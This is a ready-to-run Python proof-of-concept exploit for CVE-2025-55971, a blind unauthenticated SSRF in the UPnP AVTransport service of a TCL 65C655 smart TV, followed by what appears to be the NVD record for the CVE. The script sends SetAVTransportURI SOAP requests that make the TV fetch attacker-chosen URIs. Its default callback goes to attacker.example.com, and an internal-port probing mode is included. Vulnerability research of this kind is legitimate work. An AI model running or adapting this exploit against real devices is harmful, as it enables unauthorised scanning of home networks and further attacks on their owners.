CVE-2025-55971

#!/usr/bin/env python3 # CVE-2025-55971 - Blind Unauthenticated SSRF in TCL Smart TV UPnP/DLNA AVTransport # Exploit PoC for TCL 65C655 Smart TV (Firmware V8-R75PT01-LF1V269.001116) # Author: Szym0n13k import socket import sys import argparse TARGET_PORT = 16398 # Default UPnP AVTransport service port on TCL Smart TV SOAP_REQUEST_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body> <u:SetAVTransportURI xmlns:u="urn:schemas-upnp-org:service:AVTransport:1"> <InstanceID>0</InstanceID> <CurrentURI>{payload_uri}</CurrentURI> <CurrentURIMetaData></CurrentURIMetaData> </u:SetAVTransportURI> </s:Body> </s:Envelope>""" def send_ssrf_payload(target_ip, payload_uri, timeout=5): """ Send a malicious SetAVTransportURI SOAP request to trigger blind SSRF. :param target_ip: IP address of the target TCL Smart TV :param payload_uri: Attacker-controlled URI (e.g., http://attacker.com/callback) :param timeout: Connection timeout in seconds """ soap_payload = SOAP_REQUEST_TEMPLATE.format(payload_uri=payload_uri) http_request = ( f"POST /AVTransport/ctrl HTTP/1.1\r\n" f"Host: {target_ip}:{TARGET_PORT}\r\n" f"Content-Type: text/xml; charset=\"utf-8\"\r\n" f"Content-Length: {len(soap_payload)}\r\n" f"SOAPAction: \"urn:schemas-upnp-org:service:AVTransport:1#SetAVTransportURI\"\r\n" f"Connection: close\r\n" f"\r\n" f"{soap_payload}" ) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) sock.connect((target_ip, TARGET_PORT)) sock.sendall(http_request.encode('utf-8')) response = sock.recv(4096).decode('utf-8', errors='ignore') sock.close() print(f"[+] Request sent to {target_ip}:{TARGET_PORT}") print(f"[+] Payload URI: {payload_uri}") print(f"[+] Response:\n{response}") if "200 OK" in response: print("[+] SSRF request likely triggered successfully!") return True else: print("[-] Unexpected response received.") return False except socket.timeout: print(f"[-] Connection timed out. Target may not be reachable.") return False except ConnectionRefusedError: print(f"[-] Connection refused. Port {TARGET_PORT} may be closed.") return False except Exception as e: print(f"[-] Error: {e}") return False def probe_internal_port(target_ip, internal_host, internal_port): """ Probe internal services by leveraging the blind SSRF. Uses gopher:// or http:// scheme to target internal hosts. """ payload_uri = f"http://{internal_host}:{internal_port}/" print(f"\n[*] Probing internal service: {internal_host}:{internal_port}") return send_ssrf_payload(target_ip, payload_uri) if __name__ == "__main__": parser = argparse.ArgumentParser( description="CVE-2025-55971 - Blind SSRF PoC for TCL Smart TV UPnP AVTransport" ) parser.add_argument("target_ip", help="Target TCL Smart TV IP address") parser.add_argument( "-u", "--uri", default="http://attacker.example.com/callback", help="Attacker-controlled callback URI (default: http://attacker.example.com/callback)" ) parser.add_argument( "--probe-internal", action="store_true", help="Enable internal port probing mode" ) parser.add_argument( "--internal-host", default="127.0.0.1", help="Internal host to probe (default: 127.0.0.1)" ) parser.add_argument( "--internal-port", type=int, default=16398, help="Internal port to probe (default: 16398)" ) args = parser.parse_args() print("=" * 60) print("CVE-2025-55971 PoC - TCL Smart TV Blind SSRF") print("Target: TCL 65C655 Smart TV") print("Firmware: V8-R75PT01-LF1V269.001116") print("=" * 60) if args.probe_internal: probe_internal_port(args.target_ip, args.internal_host, args.internal_port) else: send_ssrf_payload(args.target_ip, args.uri)

{"cve": {"id": "CVE-2025-55971", "sourceIdentifier": "[email protected]", "published": "2025-10-03T16:16:17.540", "lastModified": "2025-10-15T18:17:00.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TCL 65C655 Smart TV, running firmware version V8-R75PT01-LF1V269.001116 (Android TV, Kernel 5.4.242+), is vulnerable to a blind, unauthenticated Server-Side Request Forgery (SSRF) vulnerability via the UPnP MediaRenderer service (AVTransport:1). The device accepts unauthenticated SetAVTransportURI SOAP requests over TCP/16398 and attempts to retrieve externally referenced URIs, including attacker-controlled payloads. The blind SSRF allows for sending requests on behalf of the TV, which can be leveraged to probe for other internal or external services accessible by the device (e.g., 127.0.0.1:16XXX, LAN services, or internet targets), potentially enabling additional exploit chains."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tcl:65c655_firmware:v8-r75pt01-lf1v269.001116:*:*:*:*:*:*:*", "matchCriteriaId": "1004749F-C65B-4868-85DB-6E135DFE71EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tcl:65c655:-:*:*:*:*:*:*:*", "matchCriteriaId": "71800B88-6570-4AA3-8968-A897A498739E"}]}]}], "references": [{"url": "https://github.com/Szym0n13k/CVE-2025-55971-Blind-Unauthenticated-SSRF-in-TCL-Smart-TV-UPnP-DLNA-AVTransport", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=FeNLGR_xFIA", "source": "[email protected]", "tags": ["Exploit"]}]}}